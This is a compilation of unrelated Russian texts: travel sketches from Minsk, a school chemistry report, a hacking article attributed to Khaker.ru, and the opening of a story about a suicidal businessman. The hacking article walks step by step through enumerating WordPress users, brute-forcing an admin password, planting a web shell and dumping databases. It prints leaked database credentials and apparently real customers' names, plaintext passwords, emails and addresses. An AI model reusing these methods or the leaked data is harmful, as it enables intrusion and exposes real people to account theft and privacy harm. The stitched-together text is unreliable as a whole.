    Зарисовка №3: как пройти в библиотеку?..

    После долгих размышлений на тему «как убить пару часов в этом городе, если кинотеатров тут нет, а кушать еще не хочется», мы решаем собраться, и поехать посмотреть на концептуальное здание Национальной Библиотеки. Тем более что если верить открыткам, ночью оно очень даже красиво подсвечивается.
    Итого: Минск, вечер, проспект. Мы, как «зайцы», едем 60 км/час, дабы не нарываться на неприятности, и безрезультатно ищем несчастное здание (покупайте карты, ага). Впрочем, одного желания оказывается мало, и нас благополучно останавливают за то, что машина повернула не с крайнего левого ряда, а со второго слева (с которого, в принципе, поворачивать можно, если верить разметке, но, видимо, не так резко).
    С.Б., с лучезарной улыбкой берет права, техпаспорт и удаляется на «поговорить» - с точки зрения закона нарушения не было.
    Дальше картина следующая (без слов, ибо я сижу в машине и не слышу ровным счетом ничего). Сотрудник ГАИ смотрит документы, кивает. С.Б. что-то говорит. Оба улыбаются. Сотрудник ГАИ говорит еще что-то, С.Б. кивает, после чего возвращается в машину и берет страховку. На вопрос «все нормально?» успевает ответить «конечно». Далее страховку смотрит сотрудник ГАИ и его улыбка начинает мне нравиться все меньше…
    Минут через десять С.Б. выходит из машины ГАИ, и возвращается в родные пенаты.

    С.Б. (с улыбкой до ушей): Круто. 70 долларов. Это мой самый большой штраф в жизни.
    Несса: За что???
    С.Б.: У нас не оказалось нужной страховки.
    Несса: ??? (многозначительное молчание с огромным вопросом «КАК?» в глазах)
    С.Б.: Да ладно. Все могло быть хуже – 200 баксов штрафа и права забирать в понедельник в суде.
    Несса: 3,14. Мне очень не хочется материться, но ничего более толкового в голову не лезет. Мы сто раз проверяли, нет, мы двести раз проверяли, и…
    С.Б.: …зато это самый дорогой поход в библиотеку в нашей жизни.
    Несса: Я думаю, не только в нашей. И что, будем дальше ехать?..
    С.Б.: Нет. Я думаю, вернемся в гостиницу. На сегодня хватит.

    К слову, до библиотеки мы доехали на следующий день и на метро. А нужную страховку, красная цена которой 10 у.е., так и не купили.

    Зарисовка №3: кто в теремочке живет?..

    Доблестные граждане Беларуси ублажали Lancer своим вниманием как могли – разве что в очередь на парковке не выстраивались, чтобы «прикоснуться к легенде». А все потому, что у него тонированные стекла, которые в их стране запрещены на законодательном уровне.
    К слову, 7-я BMW без тонировки выглядит несколько странно. Особенно, после привычки видеть наглухо тонированные стекла подобных машин у нас и в Европе.

    Зарисовка №4: Как мало нужно для счастья, оказывается.

    Мы с С.Б. были готовы организовать Фан-клуб замечательного водителя «Хонды», который несся по направлению границы со скоростью 160км/час, тем самым, позволив нам сесть на его хвост и сократить время в пути как минимум на треть. Мы даже хотели выйти и сказать «спасибо» на КПП, сопроводив его бананом и предложением покататься по территории нашей страны уже в обратном порядке, но в последний момент он свернул на Могилев.
    Так что если мир настолько тесен, что этот человек вдруг наткнется на мой отчет, то.

    Дяденька на «Хонде»!
    Когда Вы уехали, мы почувствовали, что в одно мгновение осиротели, а это неприятное ощущение. Поэтому постарайтесь так больше не делать – не всем из тех, кто за Вами едет, надо в Могилев. Некоторым просто хочется быстрее попасть домой.
    Удачи на дорогах и спасибо за компанию.













     

     


    Послесловие.

    Песня Bitter:Sweet “Dirty Laundry” совершенно иначе звучит ночью, под границей, в ливень на заправке, где отключен свет. Это раз.
    Два. Может, это все Германия и Koenigsegg, но к моим фетишам окончательно добавились дирижерские движения при управлении машиной с механической коробкой передач. «Автомат», конечно, автоматом, но искусство и эстетика мне, определенно, ближе.

    Доклад на тему: «Жиры, белки и углеводы»

    ,
    Жиры. Жиры составляют существенную часть нашей пищи. Они содержатся в мясе, рыбе, молочных продуктах, зерне.
    Природные животные и растительные жиры представляют собой смеси сложных эфиров, образованных высшими жирными кислотами и трехатомным спиртом глицерином .
    В состав твердых жиров входят главным образом эфиры предельных (пальмитиновой и стеариновой) кислот, а в состав жидких растительных масел – эфиры непредельной (олеиновой) кислоты. При действие водорода (в присутствии никеля в качестве катализатора) жидкие жиры превращаются в твердые вследствие присоединения водорода.
    Однако в любом природном жире есть и другие компоненты. Важнейшими из них фосфатиды, стерины, витамины, пигменты и носители запаха.
    Фосфатиды – это фактически тоже сложные эфиры, но в их состав, в отличие от жиров, входят остатки фосфорной кислоты и аминоспирта. При выпадения осадка в бутылках неочищенного растительного масла, осадком является фосфатиды, примером которых служит лецитин. Лецитин прекрасным эмульгатором, поэтому его используют в производстве шампуня.
    Стерины – природные полициклические соединения очень сложной конфигурации. Важнейшим представителем этого класса соединений является холестерин, который встречается только в жирах.
    Витамины. Ими богата печень рыбы и морского зверя, растительные жиры (Е, К), а также сливочное масло (А, Д).
    Пигменты – вещества, окраску жирам. Хлорофилл придает бледно-зеленый оттенок конопляному маслу, каротиноиды окрашивают сливочное масло в желтый цвет.
    Носители запаха очень разнообразны и сложны по строению, в сливочном масле их более 20.
    Все жиры подвергаются гидролизу (омылению). Гидролиз жиров, сам по себе медленный, катализируется сильными кислотами и энзимами, образующимся в живых организмах. Щелочи также способствуют гидролизу жиров.
    При гидролизе жира в нейтральной или кислой среде получаются глицерин и кислоты, при гидролизе же в щелочной среде вместо свободных кислот получаются их соли – мыла.
    В состав некоторых масел, например, льняного масла, входят эфиры глицерина и непредельных кислот, в молекулах которых имеется по две и по три двойных связи («высоконепредельные» или «полиненасыщенные» жирные кислоты). Такие масла обладают свойством окисляться на воздухе и, будучи нанесены на какую-нибудь поверхность, образуют твердые и прочные пленки. Они называются высыхающими маслами. Чтобы ускорить процесс высыхания, масла предварительно варят с добавкой сиккативов – оксидов металлов (кобальта, марганца или свинца), являющихся катализаторами в процессе пленкообразования. Таким образом, получают олифу, применяемую для изготовления масляных красок.
    Жиры используют для многих технических целей. Однако особенно велико их значение как важнейший составной части пищевого рациона человека и животных, наряду с углеводами и белками. Прекращение использования пищевых жиров в технике и замена их непищевыми материалами – одна из важнейших задач народного хозяйства.
    Белки. Белки – природные высокомолекулярные азотосодержащие соединения. Они играют первостепенную роль во всех жизненных процессах, являются носителями жизни. Белки содержатся во всех тканях организмов, в крови, в костях. Энзимы (ферменты), многие гормоны представляют собой сложные белки. Кожа, волосы, шерсть, перья, рога, копыта, кости, нити натурального шелка образованы белками. Белок, так же как углеводы и жиры, важнейшая необходимая составная часть пищи.
    В состав белков входят углерод, водород, кислород, азот, и часто сера, фосфор, железо. Молекулярные веса белков очень велики – от 1500 до нескольких миллионов.
    Проблема строения и синтеза белков – одна из важнейших в современной науке. В этой области в последние десятилетия достигнуты большие успехи. Установлено, что десятки, сотни и тысячи молекул аминокислот, образующих гигантские молекулы белков, соединяются друг с другом, выделяя воду за счет карбоксильных и аминогрупп.
    Белки относят к природным высокомолекулярным полиамидам или полипептидам.
    Все многообразие белков образовано 20 различными аминокислотами; при этом для каждого белка строго специфичной является последовательность, в которой остатки входящих в его состав аминокислот соединяются друг с другом. Найдены методы выяснения этой последовательности; в результате уже точно установлено строение некоторых белков. И самым замечательным достижением в этой области явилось осуществление синтеза из аминокислот простейших белков: как уже указывалась, в 50 – 60-х годах ΧΧ века синтетически получены гормон инсулин и фермент рибонуклеаза. Таким образом, доказана принципиальная возможность синтеза еще более сложных белков.
    Белки являются основой всего живого на Земле и выполняют в организмах многообразные функции.
    Белки, поступающие в организм с животной (молоко, яйца, мясо и др.) и растительной пищей, гидролизуются в конечном счете до
    α-аминокислот. В отличие от углеводов и жиров, аминокислоты в запас не откладываются. Их избыток организм «сжигает». При этом выделяется энергия, образуются мочевина, аммиак, углекислый газ, вода.
    Животные белки содержат все необходимые аминокислоты в достаточном количестве, а в растительных белках – некоторых аминокислот мало или совсем нет.
    Молекулы белка, имея активные функциональные группы, способы удерживать полярные молекулы воды. А водные системы – этом благоприятные условия для микроорганизмов. В продуктах разложения белка встречаются соединения с неприятным запахом, появление которых является признаком гниения белка.
    Сухой яичный и молочный порошок можно хранить довольно долго. Частично обезвоживаются продукты копчении. Общеизвестный метод предохранения от гниения с помощью поваренной соли. Солят мясо, рыбу. Ионы соли подавляют активность микроорганизмов. Для засолки рыбы и мяса немаловажное значение имеет размер кристаллов соли. Крупная соль растворяется медленно, и процесс гниения опережает консервацию.
    Углеводы. Главные поставщики энергии организму человека. К ним относятся сахара и вещества, превращающиеся в них при гидролизе. Углеводы – продукты растительного и животного происхождения. Наряду с белками и жирами, они являются важнейший составной частью пищи человека и животных; многие из них используются как техническое сырье. Углеводы подразделяют на моносахариды, дисахариды и полисахариды.
    Моносахариды – простейшие углеводы, они не подвергаются гидролизу – не расщепляются водой на более простые углеводы.
    Глюкоза, или виноградный сахар, C₆H₁₂O₆ - важнейший из моносахаридов; белые кристаллы сладкого вкуса, легко растворяются в воде. Содержится в соке винограда, во многих фруктах, а также в крови животных и человека. Мышечная работа совершается главным образом за счет энергии, выделяющийся при окислении глюкозы.
    Глюкоза получается при гидролизе полисахаридов крахмала и целлюлозы (под действием ферментов или минеральных кислот). Применяется как средство усиленного питания или как лекарственное вещество, при отделки тканей, как восстановитель – в производстве зеркал.
    Фруктоза, или плодовой сахар, C₆H₁₂O₆ - моносахарид, спутник глюкозы во многих и ягодных соках; значительно слаще глюкозы; в смеси с ней входит в состав меда. Представляет собой шестиатомный кетоноспирт.
    Дисахариды – углеводы, которые при нагревании с водой в присутствии минеральных кислот или под влиянием ферментов подвергаются гидролизу, расщепляясь на две молекулы моносахаридов.
    Свекловичный, или тростниковый сахар (сахароза), C₁₂H₂₂O₁₁ - важнейший из дисахаридов. Получается из сахарной свеклы или из сахарного тростника; содержатся также в соке березы, клена и некоторых фруктов. Сахароза – ценнейший пищевой продукт. При гидролизе она распадается с образованием молекулы глюкозы и молекулы фруктозы (образующая смесь этих моносахаридов называется инвертным сахаром):
    C₁₂H₂₂O₁₁+H₂O→C₆H₁₂O₆+C₆H₁₂O₆
    Лактоза C₁₂H₂₂O₁₁ - дисахарид. Этот углерод еще называют молочным сахаром, так как он преимущественно содержится в молоке животных. Человек знакомится с лактозой с первых дней жизни, ведь в материнском молоке нет других углеводов, кроме лактозы.
    Лактоза, как и глюкоза, подвергается брожению под действием особых ферментов. В результате этих процессов образуются вещества, которые придают молочным продуктам своеобразный вкус.
    Крахмал (C₆H₁₂O₅) – полисахарид, белый порошок, нерастворимый в холодной воде; в горячей – набухает, образуя коллоидный раствор. Крахмал образуется в результате фотосинтеза в листьях растений, откладывается «про запас» в клубнях, корневищах, зернах. В пищеварительном тракте человека и животных крахмал подвергается гидролизу, и превращается в глюкозу, которая усваивается организмом.
    При нагревании сухого крахмала до 200-250˚C происходит частично разложение его и получается смесь менее сложных, чем крахмал, полисахаридов, называемая декстрином. Декстрин применяется для отделки тканей и изготовки клея. Превращением крахмала в декстрин объясняется образованием блестящей корки на печеном хлебе, а также блеск накрахмаленного белья.
    Подобно жирам, крахмал в организме подвергается гидролизу. Этот процесс начинается уже при пережевывания пищи во рту под действием фермента, содержащегося в слюне.
    Целлюлоза, или клетчатка, (C₆H₁0O₅) – волокнистое вещество, главная составная часть оболочек растительных клеток. Наиболее чистая природная целлюлоза – хлопковое волокно – содержит 85-90% целлюлозы. В древесине хвойных деревьев целлюлозы содержится около 50%.
    Значение целлюлозы очень велико. Достаточно указать, что огромное количество хлопкового волокна идет для выработки хлопчатобумажных тканей. Из целлюлозы получают бумагу и картон, а путем химической переработки – целый ряд разнообразных продуктов: искусственное волокно, пластические массы, лаки, бездымный порох, этиловый спирт.
    Целлюлоза поступает к нам в организм с растительной пищей. Она проходит желудок, практически не изменяясь. Из организма человека целлюлоза практически полностью выводится непереваренной, но при этом она способствует повышению выделения пищеварительных соков на всем своем пути, нормализуя работу кишечника.

    Британника под колпаком.

    ,
    Энциклопедия Британника, созданная шотландскими просветителями - гравером Эндрю Беллом и печатником Колином Макфаркаром - это старейшая и наиболее полная энциклопедия на английском языке, первые тома которой были изданы в далеких 1768-1771 годах. Сайт Британники впервые увидел свет в 1995 году, а в данное время вплотную приближается по возможностям ко всем известной Википедии.
    Я просто не смог пройти мимо этого эпохального труда и попробовал взглянуть на онлайновую Британнику немного глубже, чем ее обычные пользователи.

    Знание - сила

    Зная, что любое энциклопедическое изыскание начинается ab ovo, я зашел на главную страницу Британники, расположенную по адресу britannica.com (или eb.com). Первая ссылка, которая меня заинтересовала, незатейливо называлась Blog и вела на britannica.com/blogs. Открыв исходник данной страницы, я пришел в восторг, так как там гордо красовалась следующая надпись:
    <meta name="generator" content="WordPress 2.2" />
    Но, как и следовало ожидать, админы Британники оказались не такими уж и простаками: хотя версия движка и была крайне древней, все известные уязвимости в ней были хорошо пропатчены, так что оставалось только продолжать поиски.
    Следующим моим шагом был, конечно же, Гугл: "inurl:britannica.com filetype:php". Походив часа два по ссылкам и снова ничего интересного не найдя, я все же решил заняться Вордпрессом.

    Грубая сила

    Немного поразмыслив, я задумал коварный план по подбору пароля в админскую часть Вордпресса с помощью банального брутфорса. Для осуществления данного плана требовались действительные логины пользователей, которые можно было собрать с помощью известного бага движка: переходим по ссылке britannica.com/blogs/?author=[N] ([N] - это ID нужного пользователя) и наблюдаем логин в тайтле страницы. Подставив по порядку несколько ID, я узнал, что на блоге присутствуют следующие юзеры:
    admin
    mlevy
    dhoiberg
    jluebering
    jhennelly
    whosch
    kkuiper
    tpappas
    rmchenry
    gmcnamee
    rhorrow
    tom
    bcosgrave
    tgallagher
    rmurraythomas
    jennifer
    ksparks
    aguttmann
    jmaguire
    rwilson

    Но логины - это только полдела, необходимо было найти еще и пароли к ним :). Для этого я воспользовался ранее упоминавшейся на страницах рубрики ][-Tools программой WBF.Gold.
    Для начала процесса брутфорса нужно настроить прогу в разделе "Параметры":
    Хост/обработчик формы: http://www.britannica.com/blogs/wp-login.php
    Метод атаки: POST
    Атрибуты Submit-кнопки: Name=wp-submit, Value=Login
    Имена полей идентификаторов: поле "Логин"=log, поле "Пароль"=pwd
    Индикация успешного входа: отсутствие текста input type="password"


    Для начала я скачал несколько объемных словарей и начал последовательную атаку по первому аккаунту с помощью сразу нескольких запущенных одновременно копий брутфорса. Спустя какое-то время я увидел, что успешно сбрутился аккаунт mlevy с паролем London :). Дело оставалось за малым - залогиниться в админку и залить шелл, чем я и занялся.

    Проникновение

    Итак, зайдя в britannica.com/blogs/wp-admin и убедившись, что юзер mlevy обладает правами администратора, я поспешил проследовать в раздел "Plugins". Здесь мне снова повезло - все плагины обладали правами на запись, так что я открыл файл akismet/akismet.php и записал в него свой веб-шелл.

    Теперь нужно было изучить сервер на предмет всяческих интересностей. Для этого я зашел в свой шелл с помощью кодового слова (britannica.com/blogs/?britan) и стал смотреть на список файлов и директорий веб-сервера в корне (/apps/docs):
    account-443
    account-80
    benandbella
    bindia
    blog.qa.tar.bz2
    catalog
    category-template.php
    contributor
    corporate-80
    dead.letter
    deprecated_site_pages-80
    dev-blog-wp22.zip
    failover
    form01-80
    forms01-80
    gcoop-80
    help-80
    httpd-advocacy
    httpd-safe-443
    https-199
    ....
    wordpress-blog-80
    wppingback-80
    www-80

    На сервере находились служебные файлы различных внутренних разделов и поддоменов Британники (которые, впрочем, были для меня не так интересны, как доступы к базам данных):
    /apps/docs/wordpress-blog-80/blogs/wp-config.php:

    define('DB_NAME', 'blogs'); // The name of the database
    define('DB_USER', 'wordpress'); // Your MySQL username
    define('DB_PASSWORD', 'gutenberg5!'); // ...and password
    define('DB_HOST', 'blogs.db'); // 99% chance you won't need to change this value

    /apps/docs/bindia/codelibrary/inc/connection.php:
    $dbConn = pg_pconnect("host=bi.db port=5432 dbname=bi user=bi password=bi");

    С помощью первого доступа я легко слил e-mail'ы, логины и пароли пользователей блога (обрати внимание, интересные пароли у британских книголюбов: Иоганн Гутенберг - это изобретатель книгопечатания), а вот для второго мне пришлось заливать уже знакомый тебе WSO веб-шелл, который умеет работать с базами данных PostgreSQL.

    Индийская Британника

    Подконнектившись к bi.db, я сразу же приступил к изучению содержимого БД нашего юзера: postgres, ihop, bi, aasl, site, ebtimeline, bil. Первые интересности обнаружились в таблице tbl_order_master, где находились следующие столбцы:
    order_id
    order_number
    order_date
    uid
    order_status
    bill_name
    bill_address
    bill_phone
    bill_email
    ship_name
    ship_address
    shipp_phone
    shipping_chrages

    и записи с адресами некой доставки:
    Адрес платежа: 55-56, Udyog Vihar, Gurgaion Phase IV, Gurgaon, Gurgaon, India
    Телефон: 9810040499
    E-mail: kaushik@britannicain.com
    Aдрес доставки: 55-56, Udyog Vihar, Gurgaion Phase IV


    Здесь домен britannicain.com (который, кстати, не работает) навел меня на мысль, что название базы "bi" - это аббревиатура от Britannica India. Собственно, с этим запросом в Гугле я и узнал, что взломал целое индийское отделение Британники, располагающееся по адресу britannicaindia.com и по пути /apps/docs/bindia на нашем сервере.
    Сам ресурс britannicaindia.com позволяет жителям Индии заказывать различные продукты издательства Encyclopaedia Britannica (книги и CD/DVD), так что оставалось только найти более подробную инфу о покупателях в базе данных.
    Понятно, что узнав адрес одного из ресурсов, которые лежат на похеканном сервере, я сразу же захотел посмотреть на остальные сайты с помощью известного ReverseIP-сервиса yougetsignal.com/tools/web-sites-on-web-server:
    advocacy.britannica.com
    benandbella.eb.com
    britannicaindia.com
    corporate.britannica.com
    corporate.eb.com
    forms01.britannica.com
    help.eb.com
    info.eb.com
    newsletter.eb.com
    newsletters.britannica.com
    partners.britannica.com
    sales.britannica.com
    statistics.eb.com
    store.britannicaindia.com
    support.britannica.com
    universal.eb.com
    www.apps.eb.com
    www.britannicaindia.com

    Как видишь, список оказался довольно-таки интересным. Но оставим его на потом, и вернемся к нашим индийским друзьям :).

    Индийский магазин

    Далее в той же базе данных я открыл таблицу tbl_register, содержащую 9 470 записей. Здесь для меня открылось чарующее зрелище: подробнейшие данные обо всех кастомерах Британники, а в качестве бонуса - кристально чистые пароли в плейн-тексте (уже в который раз замечаю, что серьезные ресурсы сильно не заморачиваются о шифровании важных данных пользователей).
    Вот лишь некоторые из таких данных:
    Honie:rose:harpritkaur@hotmail.com:D-6/13, Vasant Vihar
    ritesh:rockrover:riteshroxy@yahoo.com:sun power flats g block s.f.-4 memnagar
    pioneer:pravyogi:pravin_hande@rediffmail.com:bhau daji road
    ganguly:goa@calcutta:ganguly_sumam@yahoo.com:24, ali chirag lane,
    muthana:pretty:muthana@vsnl.com:12 Sarat Chatterjee Avenue
    anurup:mitali:anurup_m@vsnl.com:Surasree 24A, Lake View Road
    superbat393:scurvycur:superbat_393@yhaoo.co.uk:12,T.S.Krishna nagar extn,mogappair
    SuyashAnand:999999999:suyashanand@yahoo.com:xyz
    champakali:mypczenith:bbsr@lnsel.com:cuttack
    sim00:7020557:sim00@rediffmail.com:125 sainik vihar
    arka:arkaarka:kaaraak@yahoo.com:catia
    anilpost:bathinda:anilpost@hotmail.com:2242, urban estate phase-ii
    k_dasgupta:mampu:k_dasgupta@hotmail.com:PO Box 72
    madhu:rama:ureply@rediffmail.com:6576
    satyajitpani:silusilu:satyajit_pani@msn.com:cuttack chandi cuttack
    ramkishore:bansal123:ramkishore@vsnl.com:235, Katra Peran, Tilak Bazar
    rjana:1234:rjana@vsnl.net:haldia
    rakov2000:rakov2000:xaldinx@gmail.com:&3/2, Krishna Nagar
    padma:suhana:padma@ebindia.com:B-2/171, Sfdarjang Enclave
    manish:purohit:manish@manishpurohit.com:d-77 Panchsheel Enclave
    thomas:thomas:thomas@britannicain.com:l-86 madangir
    RajuV:plsGOD:vraju3@emirates.net.ae:AYDJA PO BOX 25
    vikram:krishnaaa:vikram@britannicain.com:c-266,sarita vihar

    Тысячи подобных записей я извлек с помощью нехитрого запроса "SELECT username||chr(58)||password||chr(58)||email||chr(58)||address FROM tbl_register LIMIT 30 OFFSET 0".
    Для теста я решил залогиниться по адресу britannicaindia.com/registration.php с помощью рандомного аккаунта vinay_75a;13041974, что, естественно, у меня сразу же получилось. Имея доступ к любому из аккаунтов магазина индийской Британники, можно было заказать очень много бумажных или мультимедийных копий данной энциклопедии на любые почтовые адреса :). Но я не стал заниматься таким непотребством, а всего лишь бережно слил дамп с пользователями к себе на дедик.

    Заключение

    Напоследок я решил еще немного походить по PostgreSQL базам данных. Как это не удивительно, но в некой базе bil в таблице users также оказались незашифрованные пароли:
    gabie;springsprung
    tea;tea
    mwiechec;password
    sabis123!;sabisimages
    erc123!;ercimages
    kossuth;kossuth123!

    и так далее.
    Поразившись такому халатному отношению к своим же собственным юзерам, я слил все доступные данные, а также скачал исходники всех сайтов-поддоменов Британники с ReverseIP-сервиса. После неудачной попытки порутать пропатченную машинку я удалил все свои шеллы и написал админам на мыло, чтобы они внимательнее относились к своим паролям и, соответственно, пользователям.
    Тебе же я в очередной раз могу посоветовать не смотреть на историю и размах любого онлайн-проекта, а просто немного глубже вглядеться его структуру. Быть может, именно ты будешь тем человеком, кто найдет знаменательный баг в какой-нибудь... Википедии :).
    Взято с ХАКЕР.РУ

    Общество с Ограниченной Ответственностью

    ,
    Алексей Сергеевич уныло смотрел в дуло старинного пистолета. Несмотря на то, что одному из экспонатов его маленькой, только начавшей наполняться, оружейной коллекции было лет двести, он находился в полной боевой готовности и сейчас ласково и нежно глядел на своего хозяина, обещая полное избавление неудачливого бизнесмена от всех земных проблем.
    - Сейчас я тебе снесу башку, и все будет хорошо, - сладко пела пуля в утробе древнего орудия.
    - Да уж, лучше и не будет… - рассеяно отвечал ей Алексей Сергеевич.
    Полный крах всего и вся. Сотрудники компании уже давно приходили в офис лишь для того, чтобы спросить «а когда же зарплата?». Заявление на увольнение, правда, пока написало только два служащих из сорока, но это было заслугой царившего в мире кризиса, работников удерживала лишь мысль «да сейчас везде так, а вдруг выкарабкаемся». Клиенты никак не хотели переходить на систему предоплаты, придерживаясь принципа «днем стулья, вечером – деньги». А «стульев» без денег тоже не было. Компания свернулась в замкнутый круг, который становился все меньше и меньше, обруч краха сдавливал, душил, ломал кости. Все имущество давно было заложено - Алексей Сергеевич сидел на чужом стуле, писал за чужим столом и чужой ручкой, ездил на чужой машине, спал на чужой кровати. Хотя какое «спал»? Сном это назвать было сложно, вся жизнь превратилась в сплошной полубред. Выхода не было. Были лишь долги. Было яростное нежелание терять все, что только начинало получаться, что с таким трудом строилось. И было вот это дуло пистолета, которое уже несколько недель каждый вечер вертел в руках бизнесмен.
    « Дочку жалко» - подумал Алексей. – «Да не пропадет она, вон уже МГУ четвертый курс почти заканчивает, хватило ума мне все-таки сразу за всю учебу заплатить»
    В этот момент ноутбук как-то уж слишком жизнерадостно тренькнул.
    В правом нижнем углу экрана вылезло окошко – почтовая программа извещала о получении электронного послания. Тема сообщения заставила Алексея Сергеевича ухмыльнуться. «Помочь? - спрашивал некий отправитель ООО.
    - Ага, - ответил ноутбуку бизнесмен. – нажми на курок, а то самому страшно.
    Но, впрочем, само письмо открыл.
    Сообщение было кратким:
    «-ООО «Общество с Ограниченной Ответственностью»
    -решаем АБСОЛЮТНО ЛЮБЫЕ проблемы
    -оплата по результатам работы»
    И все. Ничего больше. Обычный спам. Тем более в два часа ночи
    Алексей снова взял в руки пистолет и мрачно пошутил:
    - Решите проблему моего убийства. Оплачу по результату.
    Затем попытался засунуть себе дуло в рот. Черт, страшно. Очень страшно. Как же обмануть этот хренов инстинкт самосохранения?!
    Предприниматель резким движением поднес пистолет к виску. Тяжелый, сука… Алексей зажмурился.
    «Ну давайте, проноситесь перед глазами, лучшие моменты жизни, все - конец уже!!!». Однако, почему-то вместо картинок счастливого детства перед глазами встали три строчки полученного сообщения. Письмо почему-то дарило надежду уже давно ни во что не верящему сорокашестилетнему цинику.
    Алексей снова отложил пистолет. Где-то минут пять мужчина сидел без единого движения, зарывшись пальцами в седеющую шевелюру. Затем медленно потянулся к ноутбуку. Курсор мыши, чуть дрожа, дополз до кнопки «ответить». Пальцы, недавно собиравшиеся спустить курок, легли на клавиатуру.
    «Помогите!»
    Письмо ушло. Предприниматель откинулся на спинку стула и уставился в монитор. Через двадцать секунд электронка очередной раз мелодично пропела.
    «Мы знаем о ваших проблемах. И готовы вам помочь. Позвоните по следующему номеру».
    Бизнесмен послушно взял в руки телефон и набрал указанный номер.
    - Здравствуйте, Алексей Сергеевич. – в трубке раздался приятный мужской голос. – Вы заинтересованы в наших услугах?
    - Я еще не знаю, что вы конкретно предлагаете. Вы легальны?
    - Вас это правда интересует?
    - Раньше бы очень интересовало…
    - Ну вот видите. Что бы вы хотели спросить о нашей работе?
    - Как вы собираетесь решить мою проблему?
    - Вам просто начнет везти.
    - Не понял.
    - Просто вы завтра с утра просыпаетесь и начинаете работать. В усиленном режиме. Ездить, искать, договариваться. То есть то, что вы делали до этого. Только с той лишь разницей, что в этот раз у вас все будет получаться.
    Алексей на несколько минут задумался. Услышанное как-то совершенно не укладывалось в его прагматическое сознание. Мистика какая-то. Но, впрочем, его сейчас только чудо и могло спасти.
    - Это очень странное предложение. – наконец ответил он
    - Оно кажется странным. Впрочем, мы не навязываемся. Но мы реально можем помочь. И пожалуй мы единственные, кто вообще способен вытянуть вас из сложившейся ситуации. – голос говорящего звучал крайне уверенно. Какими бы абсурдными не казались его слова, но почему-то подсознание изо всех сил кричало: «Поверь! Поверь! Он не обманывает!»
    - Вы - Гэндальф Серый? – полупошутил Алексей
    - Не совсем. – абсолютно серьезно и опять-таки крайне уверенно произнесли на другом конце радиоволны. – у нас задачи другие.
    - И какие же?
    - Заработать, естественно.
    - Похвально… Да, кстати, какова цена вопроса?
    - Это мы обсудим по результатам вашего с нами сотрудничества. Плата будет для вас крайне существенна, но она будет сопоставима с вашей выгодой и не будет критична.
    - Может сразу определимся с процентом от выручки тогда? – спросила деловая жилка, на секунду выбравшаяся из пучин черного отчаяния.
    - А кто вам сказал, что оплата будет в деньгах?
    Деловитость Алексея Сергеевича сразу же ускользнула обратно, загородившись страхом, непониманием и растерянностью. Впрочем наружу уже явно рвались другие чувства. «Он же правда поможет!»
    - А в чем тогда измеряется цена?
    - Это все мы обговорим потом.
    - То есть я не знаю, на что подписываюсь?
    - Вы подписываетесь на решение ваших проблем. Кстати, собственно, подписываться нигде не надо. Мы – Общество с Ограниченной Ответственностью не потому, что у нас такая организационно-правовая форма. Мы не составляем договор, где четко прописаны предмет, обязанности и права сторон. Достаточно вашего устного согласия. И соглашение вступает в силу.
    - Это… Это… очень странно. А если я вас «кину»?
    - Ну это уже будут наши проблемы. А раз мы успешно решаем чужие, то решим и свои. Алексей Сергеевич, вам не нужно торговаться. Мы не требуем предоплат. Мы поставляем вам удачу. Фарт. Везение. Потом забираем то, что нам нужно.
    - А мне будет везти?
    - Именно.
    Голос звучал крайне убедительно. Сильный, волевой, он успокаивал и внушал доверие. Предприниматель по-прежнему ничего не понимал, но уже практически безгранично верил невидимому собеседнику. Каким-то образом неизвестный сумел выпустить на свободу детскую веру в добрых волшебников. И то, что этот добрый волшебник требовал плату за свои услуги, прекрасно вписывалось в мировосприятие акулы бизнеса. Вдобавок в памяти всплыло лицо любимой дочки. «Что ж ты, скотина такая, стреляться собрался, оставив ей после себя лишь кучу долгов?!» - ругал себя мужчина. Решение созрело. Он все равно ничего не терял.
    - Я согласен. – твердо сказал он в трубку.
    - Прекрасно. Будем рады с вами сотрудничать. Мы сразу же начинаем работать. Спокойной ночи, Алексей Сергеевич. Не опускайте руки. У вас все получится. Просто нужно работать.
    - До свидания.
    Предприниматель положил телефон. «У вас все получится» - звучал в голове этот спокойный и уверенный голос. «У меня все получится…» - отвечал ему Алексей. – «Да, ебтвоюмать, у меня все получится!!! А сейчас я пошел спать, и пошли все на хуй!!!»
    «Уже везёт…» - пронеслась мысль в засыпающем мозгу бизнесмена. – «Я так давно не мог заснуть…»
    В девять-тридцать утра Алексей Сергеевич зашел в свой кабинет. Там уже собрались руководители всех подразделений. Вообще-то планерка должна было начаться в девять, но в последнее время многие, отчаявшись уже что-то сделать, пренебрегали своими обязанностями, правилами, поэтому нередки были и двадцатиминутные опоздания. Надо было быть уверенным, что соберутся все.
    Подчиненные с удивлением посмотрели на директора. Давно они не видели его уже таким: подтянутым, посвежевшим, энергичным.
    - Есть что интересного? – обратился Алексей к начальнику отдела продаж.
    Тот немного смутился. По правде говоря, бодрый вид «генерала» поначалу внушил надежду, что он УЖЕ нашел проблему. А тут такие вопросы.
    - Да по правде говоря, Алексей Сергеевич, ничего. По-прежнему клиентов нет. А те, кто есть – не готовы оплачивать вперед. Одна только мелкая какая-то конторка только что звонила из небольшого городка. Сказала, любые деньги даем, можно вперед, если мы им через три часа привезем небольшую партию пожарно-охранного оборудования. У них там клиент какой-то суперкрутой, обещал нехилый бонус за сроки выполнения. Дотуда триста километров. В транспортной компании нам сказали, что-то вроде «Да ну вас с вашими запросами…».
    «Черт, когда же должно было начаться везение?..» – приуныл Алексей. – «Чего он там мне говорил? Фарт… Удача…»
    «Не опускайте руки. У вас все получится. Просто нужно работать» - вспомнились другая фраза. А как работать-то?
    Минутку…
    - Чего там эта конторка-то предлагала?
    - Какая? Ну триста километров, три часа, уже два с половиной осталось. Нереал в общем.
    - А партия какова?
    - Ну пять коробок, там тысяч на двести. При обычных оптовых ценах.
    - А у нас сейчас есть на складе столько?
    - Этого добра, хоть отбавляй. Вообще не берут в последнее время.
    - Звони им! –гаркнул Алексей Сергеевич. – Скажи, что мы согласны! Требуй не меньше трехсот, ну да чего я тебя я учить буду, торговаться ты умеешь!
    - Но... Как?
    - Бегом! Пусть деньги переводят! А коробки со склада и ко мне в джип!
    - Алексей Сергеевич, вы сами?.. но всего лишь триста тысяч…
    - Я поехал. – отрезал дальнейшие вопросы бизнесмен.
    Джип летел по трассе со скоростью 180 километров час. Это было лишение прав, но Алексей верил в свою удачу. Он же её купил.
    Он успел. Снабженец фирмы-клиента показал ему платежку, и пошел разгружать джип:
    - Спасибо огромное, черт, оперативно работаете. Можно у вас заказать будет еще на следующей неделе, со скидочкой там какой-нибудь?
